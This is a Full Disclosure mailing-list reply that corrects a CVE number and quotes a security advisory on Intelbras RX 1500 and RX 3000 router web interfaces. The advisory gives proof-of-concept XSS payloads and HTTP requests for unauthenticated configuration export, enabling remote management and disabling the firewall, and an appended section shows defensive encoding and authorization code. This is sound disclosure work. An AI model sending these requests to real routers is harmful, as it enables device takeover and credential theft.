Message-ID: <CAAAPD15=TTtM=n4gaqWcWJ-krbxxUermaoFK+Phx9RnzveN8NA@mail.gmail.com>
Date: Mon, 21 Jul 2025 12:19:10 -0300
From: Palula Brasil <palulabrasil@...il.com>
To: Gabriel Augusto Vaz de Lima <gabriel.lima@...pest.com.br>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] Multiple vulnerabilities in the web management interface of Intelbras routers

The following snippet in the text is associated with the wrong CVE number:
2.2 Possibility of injecting JavaScript code into the name of the visiting
network (XSS) - CVE-2025-26064

The correct CVE number for item 2.2 is CVE-2025-26065.

On Sun, Jul 20, 2025 at 3:22 AM Gabriel Augusto Vaz de Lima via
Fulldisclosure <fulldisclosure@...lists.org> wrote:

> =====[Tempest Security Intelligence]==========================================
>
> Multiple vulnerabilities in the web management interface of Intelbras
> routers
>
> Author: Gabriel Lima <gabriel lima () tempest com br >
>
> =====[Table of Contents]======================================================
>
> 1. Overview
> 2. Detailed description
> 3. Other contexts & solutions
> 4. Acknowledgements
> 5. Timeline
> 6. References
>
> =====[1. Overview]============================================================
>
> * Systems affected:
>
> Intelbras web interface RX 1500 - 2.2.9 (verified) (other routers/versions may be affected)
>
> Intelbras web interface RX 3000 - 1.0.11 (verified) (other routers/versions may be affected)
>
> * Release date: 07/14/2025
>
> * Impact: Several vulnerabilities were found providing retrieval of
> administrative session tokens and direct unauthenticated access to
> sensitive features that allow the recovery of current router configuration.
>
> The new generation of connection comes via Wi-Fi 6 technology, delivering
> more speed, more network efficiency and less interference. Router RX 1500
> [1] and RX 3000 [2] are ideal for residential plans with high-speed plans
> and high-performance connections.
>
> =====[2. Detailed description]================================================
>
> The web management system for the RX 1500 and 3000 routers is designed to
> help the device’s administrator configure the device in the best way for
> their needs. However, upon carrying out security research, multiple
> vulnerabilities related to XSS and direct unauthenticated access were
> spotted.
>
> As a result of performing this research, two types of vulnerabilities were
> found: Cross-Site Scripting (XSS) vulnerabilities and Direct
> Unauthenticated Access vulnerabilities.
>
> In regard to the XSS vulnerabilities, as a means to portray impact
> outcomes, an unauthenticated attacker may gain administrative access to the
> system and have full control of the router. On the other hand, an attacker
> with administrator access is able to create persistence to maintain access.
>
> Furthermore, in regard to the direct and unauthenticated access
> vulnerabilities, the application hosts endpoints that provide the
> retrieval of log files and the router's configuration file, which in turn,
> stores the device's password and its current settings. An important
> highlight regards the fact that any feature can be accessed in an
> unauthenticated manner, as long as an administrator is authenticated and
> active within the system.
>
> The following section dissects the XSS issues.
>
> 2.1 Possibility of injecting JavaScript code into client names (XSS) -
> CVE-2025-26064
>
> An authenticated threat may inject persistent JavaScript from the connected
> clients configuration feature (Home > Connected clients). This problem
> occurs due to the lack of character handling in the “Name” field.
>
> As proof of concept, the following payload was used:
>
> &lt;script&gt;alert(1)&lt;/script&gt;
>
> Payload used in plain text:
>
> <script>alert(1)</script>
>
> The following request pinpoints the insertion of the payload:
>
> [snippet]
> POST /HNAP1/ HTTP/1.1
> Host: 10.0.0.1
> Content-Type: text/xml; charset=utf-8
> SOAPAction: "http://purenetworks.com/HNAP1/SetClientInfo"
> X-Requested-With: XMLHttpRequest
> Content-Length: 596
> Cookie: uid=COOKIE-HERE
>
> <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetClientInfo xmlns="http://purenetworks.com/HNAP1/"><ClientInfoLists><ClientInfo><MacAddress>Client-MacAddresss</MacAddress><NickName>PAYLOAD-IN-HTML-ENCODE</NickName><ReserveIP></ReserveIP><secRouter></secRouter><Type>WIFI_5G</Type><COMMAND>change</COMMAND></ClientInfo></ClientInfoLists><COMMAND></COMMAND></SetClientInfo></soap:Body></soap:Envelope>
> [/snippet]
>
> Upon submitting this request, please note the outcome rendered within the
> context of the victim's browser.
>
> 2.2 Possibility of injecting JavaScript code into the name of the visiting
> network (XSS) - CVE-2025-26064
>
> An authenticated threat may inject persistent JavaScript from the Guest
> Network functionality (in the Settings > Wi-Fi > Guest Network menu). This
> problem occurs due to the lack of character handling in the “Wi-Fi network
> name” field (both in 2.4GHz and 5GHz).
>
> As a proof of concept, the following payloads were HTML encoded and
> inserted into each field:
>
> 2.4GHz network: &lt;script&gt;alert(1)&lt;/script&gt;
>
> 5GHz network: &lt;script&gt;alert(2)&lt;/script&gt;
>
> Payloads used in plain text:
>
> 2.4GHz network: <script>alert(1)</script>
>
> 5GHz network: <script>alert(2)</script>
>
> The following portrays an example of the request submitted by the attacker:
>
> [snippet]
> POST /HNAP1/ HTTP/1.1
> Host: 10.0.0.1
> Content-Type: text/xml; charset=utf-8
> SOAPAction: "http://purenetworks.com/HNAP1/SetMultipleActions"
> X-Requested-With: XMLHttpRequest
> Content-Length: 2991
> Cookie: uid=COOKIE-HERE
>
> <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetMultipleActions xmlns="http://purenetworks.com/HNAP1/"><SetWLanRadioSettings xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_2.4GHz_Guest</RadioID><OpenMainWiFiFirst>false</OpenMainWiFiFirst><Enabled>true</Enabled><Mode>802.11bgn</Mode><SSID>PAYLOAD-IN-HTML-ENCODE-2.4GHz</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>20/40</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>false</QoS><ScheduleName>Always</ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><WmmCapable></WmmCapable><MuOfdma></MuOfdma><MuMimo></MuMimo><Beamforming></Beamforming><ETxBfEnCond></ETxBfEnCond><TWTSupport></TWTSupport><BssColor></BssColor></SetWLanRadioSettings><SetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_2.4GHz_Guest</RadioID><Enabled>false</Enabled><Type>OPEN</Type><Encryption>NONE</Encryption><KeyRenewal></KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>ROUTER-KEY</Key></SetWLanRadioSecurity><SetWLanRadioSettings xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_5GHz_Guest</RadioID><OpenMainWiFiFirst>false</OpenMainWiFiFirst><Enabled>true</Enabled><Mode>802.11anac</Mode><SSID>PAYLOAD-IN-HTML-ENCODE-5GHz</SSID><SSIDBroadcast>true</SSIDBroadcast><ChannelWidth>20/40/80</ChannelWidth><Channel>0</Channel><SecondaryChannel>0</SecondaryChannel><QoS>false</QoS><ScheduleName></ScheduleName><TXPower></TXPower><Coexistence>false</Coexistence><WmmCapable></WmmCapable><MuOfdma></MuOfdma><MuMimo></MuMimo><Beamforming></Beamforming><ETxBfEnCond></ETxBfEnCond><TWTSupport></TWTSupport><BssColor></BssColor></SetWLanRadioSettings><SetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/"><RadioID>RADIO_5GHz_Guest</RadioID><Enabled>false</Enabled><Type>OPEN</Type><Encryption>NONE</Encryption><KeyRenewal></KeyRenewal><RadiusIP1></RadiusIP1><RadiusPort1></RadiusPort1><RadiusSecret1></RadiusSecret1><RadiusIP2></RadiusIP2><RadiusPort2></RadiusPort2><RadiusSecret2></RadiusSecret2><Key>ROUTER-KEY</Key></SetWLanRadioSecurity><SetGuestZoneRouterSettings xmlns="http://purenetworks.com/HNAP1/"><InternetAccessOnly>false</InternetAccessOnly><IPAddress></IPAddress><SubnetMask></SubnetMask><DHCPServer>true</DHCPServer><DHCPRangeStart></DHCPRangeStart><DHCPRangeEnd></DHCPRangeEnd><DHCPLeaseTime>0</DHCPLeaseTime></SetGuestZoneRouterSettings></SetMultipleActions></soap:Body></soap:Envelope>
> [/snippet]
>
> By accessing the system's home page (namely: the Status page), one can
> observe the JavaScript rendering for both fields.
>
> 2.3 Possibility of multiple JavaScript code injections in the Site Survey
> feature (XSS) - CVE-2025-26063
>
> The “Site Survey” feature (Management > Site Survey) has the purpose of
> displaying nearby active WIFI networks, and presenting their ESSIDs among
> other details. However, due to the lack of character handling, whenever an
> attacker creates a fake WIFI network containing HTML/JavaScript code (e.g.
> “<script>alert(1)</script>”), and the router administrator uses this
> feature, the malicious code will be executed at the moment the tab listing
> all available ESSIDs is opened.
>
> As a proof of concept, an SSID with the following name was created:
>
> <script>alert(1)</script>
>
> The following portrays an example of the request made by the administrator
> upon starting “Site Survey” scan:
>
> [snippet]
> POST /HNAP1/ HTTP/1.1
> Host: [redacted]
> SOAPAction: "http://purenetworks.com/HNAP1/igd_wifi_list_scan_start"
> X-Requested-With: XMLHttpRequest
> Content-Length: 357
> Cookie: [redacted]
>
> <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><igd_wifi_list_scan_start xmlns="http://purenetworks.com/HNAP1/"><radio>2.4g</radio></igd_wifi_list_scan_start></soap:Body></soap:Envelope>
> [/snippet]
>
> The XSS is executed by hovering the mouse pointer over the network's name
> (highlighted in the graphic presented within the router’s/device’s web
> management interface) or by opening the nearby devices section.
>
> The following section dissects the direct unauthenticated access issues.
>
> 2.4 Incorrect Access Control - CVE-2025-26062
>
> This section will address 3 access control breach vulnerabilities,
> considered by MITRE to be duplicates. For better understanding, they will
> be considered only as one topic.
>
> 2.4.1 Possibility of retrieving router logs
>
> The given router's administrative interface provides a feature (Management > System log) that allows an authenticated entity (e.g: an administrator)
> to retrieve the router's log file, which may contain potentially sensitive
> debug information. However, due to the lack of permissions validation, an
> unauthenticated entity can download the file without performing the
> authentication procedure.
>
> The following is an example request used as proof of concept:
>
> [snippet]
> POST /cgi-bin/dllog.cgi HTTP/1.1
> Host: 10.0.0.1
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 13
>
> Export=Export
> [/snippet]
>
> As a result, a log file containing potentially sensitive information is
> provided for download.
>
>
> 2.4.2 Possibility of recovering backups of router settings
>
> The given router's administrative interface provides a feature (Management > System) that allows an authenticated entity (e.g: an administrator) to
> retrieve the router's current configuration file, which may contain
> potentially sensitive information pertaining to the environment. However,
> due to the lack of permissions validation, an unauthenticated entity can
> download the file without performing the authentication procedure.
>
> To exploit the aforementioned concept, the following snippet illustrates
> the request made at the affected point by an unauthenticated attacker
> retrieving the router's configuration file, as well as showing part of the
> contents of the ".cfg" file in the request response:
>
> [snippet]
> POST /cgi-bin/ExportSettings.sh HTTP/1.1
> Host: 10.0.0.1
> Content-Type: application/x-www-form-urlencoded
> Content-Length: 13
>
> Export=Export
> [/snippet]
>
> As a result of submitting the previously shown request, the retrieval of
> the .cfg backup file is done without the need for providing proper
> authorization.
>
> 2.4.3 Possibility of accessing various functionalities in an
> unauthenticated manner
>
> Various router features, such as editing firewall rules, configuring Wi-Fi
> specifications, and changing router security rules and policies, were found
> to be accessible in an unauthenticated manner if an administrator
> synchronically accessed the router's administrative interface at the moment
> of exploitation.
>
> In other words, the only caveat necessary to exploit this unauthenticated
> access is having an administrator logged in at the moment of exploitation.
>
> The following snippet represents a request to render the router's
> administrative interface publicly accessible (e.g.: accessible from the
> Internet):
>
> [snippet]
> POST /HNAP1/ HTTP/1.1
> Host: 10.0.0.1
> Content-Type: text/xml; charset=utf-8
> SOAPAction: "http://purenetworks.com/HNAP1/SetAdministrationSettings"
> X-Requested-With: XMLHttpRequest
> Content-Length: 491
>
> <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetAdministrationSettings xmlns="http://purenetworks.com/HNAP1/"><HTTPS>false</HTTPS><RemoteMgt>true</RemoteMgt><RemoteMgtPort>8080</RemoteMgtPort><RemoteMgtHTTPS>false</RemoteMgtHTTPS><InboundFilter></InboundFilter></SetAdministrationSettings></soap:Body></soap:Envelope>
> [/snippet]
>
> The following snippet portrays a request with the purpose of disabling the
> router's Denial of Service (DoS) protection:
>
> [snippet]
> POST /HNAP1/ HTTP/1.1
> Host: 10.0.0.1
> Content-Type: text/xml; charset=utf-8
> SOAPAction: "http://purenetworks.com/HNAP1/SetFirewallEnableSettings"
> X-Requested-With: XMLHttpRequest
> Content-Length: 381
>
> <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><SetFirewallEnableSettings xmlns="http://purenetworks.com/HNAP1/"><Firewall_Enabled>false</Firewall_Enabled></SetFirewallEnableSettings></soap:Body></soap:Envelope>
> [/snippet]
>
> Other features are accessible in an unauthenticated manner, as long as the
> request is sent when the administrator is active.
>
> According to the arguments disclosed in this section, various attack
> vectors for administrative access originating from the perspective of an
> unauthenticated user become feasible. Furthermore, once authenticated as
> an administrator, an attacker would be able to generate persistence with
> the same approaches.
>
> =====[3. Other contexts & solutions]==========================================
>
> In regard to the XSS disclosed issues, it is recommended that all
> information coming from third parties (databases, other applications,
> client-side, etc.) have their special characters converted to the **HTML
> Entities** character set. Moreover, the data must be semantically filtered
> to guarantee that it conforms to the expected format and is free of any
> undesired characters.
>
> In regard to the unauthenticated access disclosed issues, it is strongly
> recommended that changes be made to the application's existing session
> management and access control, such that access to sensitive
> functionalities is available only to authenticated users, and that these
> users perform only actions permitted by their authorization profile.
>
> Moreover, it is important to highlight that all logic that determines
> whether a user has the necessary permissions to perform a certain action
> must execute **exclusively on the server-side**.
>
> =====[4. Acknowledgements]====================================================
>
> - Joaquim Brasil de Oliveira < joaquim brasil () tempest com br >
>
> - Tempest Security Intelligence[3]
>
> =====[5. Timeline]============================================================
>
> 07/15/2024 - We contacted the manufacturer reporting an XSS vulnerability in the Site Survey functionality;
> 07/16/2024 - The vendor requested contact information;
> 07/17/2024 - Contact information has been sent to the supplier;
> 07/17/2024 - The vendor has begun the process of validating and acknowledging the first bug reported;
> 07/22/2024 - A full report has been sent with all the other discovered vulnerabilities;
> 07/25/2024 - The vendor acknowledged all the vulnerabilities reported in the RX 1500 and RX 3000 devices;
> 09/19/2024 - The vendor has released the beta version of the corrected firmware 2.2.12;
> 09/23/2024 - All points have been retested and fixed;
> 01/27/2025 - Request CVE IDs from MITRE;
> 02/24/2025 - MITRE sent the CVE IDs;
> 07/14/2025 - Publication date.
>
>
>
> =====[6. References]==========================================================
>
> [1] <http://www.asus.com/Networking/RTAC68U/>
> https://www.intelbras.com/pt-br/roteador-wi-fi-6-dual-band-rx-1500
>
> [2] http://intelbras.com/pt-br/roteador-wireless-rx-3000
>
> [3] https://tempest.com.br
>
> --
>
> This message is intended solely for the use of its addressee and may contain privileged or confidential information. All information contained herein shall be treated as confidential and shall not be disclosed to any third party without Tempest’s prior written approval. If you are not the addressee you should not distribute, copy or file this message. In this case, please notify the sender and destroy its contents immediately.
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: https://seclists.org/fulldisclosure/



-- 
Palula Brasil

palulabrasil*SPAM*gmail.com
24E5 3ED3 E77C F868 805D
F843 E156 6DB8 49FB 8B40
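The advisory's section 3 names two fixes: HTML-entity encoding of names that reach the page (client nicknames, guest SSIDs, SSIDs seen by the Site Survey) and server-side access control bound to the authenticated user, rather than to the fact that some administrator is currently logged in. The following is an added example illustrating both points; it is not code from the advisory, from Tempest, or from Intelbras firmware. The function names (escapeHtml, isValidSsid, renderNetworkRow, parseCookies, authorize), the request object shape, the session store and the public-path allowlist are all hypothetical and constructed for the example.

```javascript
"use strict";
// Added example, not part of the advisory or of any router firmware.
// (1) entity-encode untrusted names at the HTML sink;
// (2) deny by default unless the request's own cookie maps to an admin session.
// All names and data structures below are hypothetical.

// ---- (1) Output encoding ---------------------------------------------------
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };

// Converts the five HTML-significant characters to entities. The result is
// safe inside element text and inside double-quoted attribute values.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Semantic check on input, in addition to encoding on output: an IEEE 802.11
// SSID is 1..32 octets, and control characters have no business in one.
// Note that '<' and '>' are legal in an SSID, so this check alone cannot
// stop the advisory's payload; the encoding at the sink is what does.
function isValidSsid(name) {
  const octets = new TextEncoder().encode(name).length;
  return octets > 0 && octets <= 32 && !/[\x00-\x1f\x7f]/.test(name);
}

// Builds one row of a Site Survey / Status table. Every interpolated value
// came over the air or from a client, so every one is encoded, here at the
// sink rather than at storage time.
function renderNetworkRow(ssid, signalDbm) {
  const safe = escapeHtml(ssid);
  return `<tr><td title="${safe}">${safe}</td><td>${escapeHtml(signalDbm)}</td></tr>`;
}

// ---- (2) Server-side authorization ----------------------------------------
// Constructed allowlist of paths that need no session. Everything else is
// denied by default, which covers /cgi-bin/dllog.cgi,
// /cgi-bin/ExportSettings.sh and every /HNAP1/ action in the advisory.
const PUBLIC_PATHS = new Set(["/", "/login.html"]);

function parseCookies(header) {
  const jar = {};
  for (const part of (header || "").split(";")) {
    const eq = part.indexOf("=");
    if (eq > 0) jar[part.slice(0, eq).trim()] = part.slice(eq + 1).trim();
  }
  return jar;
}

// request: { path, headers: { cookie? } } (constructed shape).
// sessionStore: Map<uid, { role, expires }> that lives only on the device.
function authorize(request, sessionStore, now = Date.now()) {
  if (PUBLIC_PATHS.has(request.path)) return { allowed: true, reason: "public path" };
  const uid = parseCookies(request.headers.cookie).uid;
  const session = uid ? sessionStore.get(uid) : undefined;
  // The decisive check: no session tied to *this* request means deny, no
  // matter how many other administrators happen to be logged in right now.
  if (!session) return { allowed: false, reason: "no session bound to this request" };
  if (session.expires <= now) {
    sessionStore.delete(uid);
    return { allowed: false, reason: "session expired" };
  }
  if (session.role !== "admin") return { allowed: false, reason: "role not permitted" };
  return { allowed: true, reason: "authenticated administrator" };
}

// Stand-alone demonstration on constructed data: the advisory's PoC string
// as an SSID, and an unauthenticated export request sent while an admin
// session ("abc123") is active on the device.
function demo() {
  const payload = "<script>alert(1)</script>";
  const store = new Map([["abc123", { role: "admin", expires: 2000 }]]);
  return {
    row: renderNetworkRow(payload, -45),
    ssidAccepted: isValidSsid(payload),
    anonymousExport: authorize({ path: "/cgi-bin/ExportSettings.sh", headers: {} }, store, 1000),
    ownSessionExport: authorize({ path: "/cgi-bin/ExportSettings.sh", headers: { cookie: "uid=abc123" } }, store, 1000),
  };
}

console.log(demo());
```

Running it shows the payload rendered as `&lt;script&gt;alert(1)&lt;/script&gt;` in both the cell text and the title attribute (the hover tooltip mentioned in 2.3), the anonymous export denied even though an administrator session exists, and the same request allowed once it carries its own admin cookie.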